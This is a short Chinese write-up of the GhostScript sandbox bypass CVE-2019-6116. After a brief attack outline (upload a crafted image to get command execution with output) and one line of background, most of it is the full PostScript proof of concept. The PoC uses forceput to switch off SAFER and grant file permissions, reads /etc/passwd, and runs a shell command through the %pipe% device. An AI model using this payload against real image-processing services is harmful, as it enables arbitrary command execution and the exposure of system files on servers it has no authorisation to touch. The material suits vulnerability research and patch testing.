GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)

by ADummy


​ 构造poc png图片—>上传图片—>有回显命令执行


​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。


将POC作为图片上传,执行命令id > /tmp/success && cat /tmp/success


% extract .actual_pdfpaintproc operator from pdfdict
/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def/exploit {(Stage 11: Exploitation...)=/forceput exch defsystemdict /SAFER false forceputuserparams /LockFilePermissions false forceputsystemdict /userparams get /PermitFileControl [(*)] forceputsystemdict /userparams get /PermitFileWriting [(*)] forceputsystemdict /userparams get /PermitFileReading [(*)] forceput% updatesave restore% All done.stop
} deferrordict /typecheck {/typecount typecount 1 add def(Stage 10: /typecheck #)=only typecount ==% The first error will be the .knownget, which we handle and setup the% stack. The second error will be the ifelse (missing boolean), and then we% dump the operands.typecount 1 eq { null } iftypecount 2 eq { pop 7 get exploit } iftypecount 3 eq { (unexpected)= quit }  if
} put% The pseudo-operator .actual_pdfpaintproc from pushes some
% executable arrays onto the operand stack that contain .forceput, but are not
% marked as executeonly or pseudo-operators.
% The routine was attempting to pass them to ifelse, but we can cause that to
% fail because when the routine was declared, it used `bind` but many of the
% names it uses are not operators and so are just looked up in the dictstack.
% This means we can push a dict onto the dictstack and control how the routine
% works.
<</typecount      0/PDFfile        { (Stage 0: PDFfile)= currentfile }/q              { (Stage 1: q)= } % no-op/oget           { (Stage 3: oget)= pop pop 0 } % clear stack/pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op/gput           { (Stage 5: gput)= }  % no-op/resolvestream  { (Stage 6: resolvestream)= } % no-op/pdfopdict      { (Stage 7: pdfopdict)= } % no-op/.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index/pdfdict        { (Stage 9: pdfdict)=% cause a /typecheck error we handle abovetrue}
>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=% Demonstrate reading a file we shouldnt have access to.
(/etc/passwd) (r) file dup 64 string readline pop == closefile(Attempting to execute a shell command...)= flush% run command
(%pipe%id > /tmp/success) (w) file closefile(All done.)=quit

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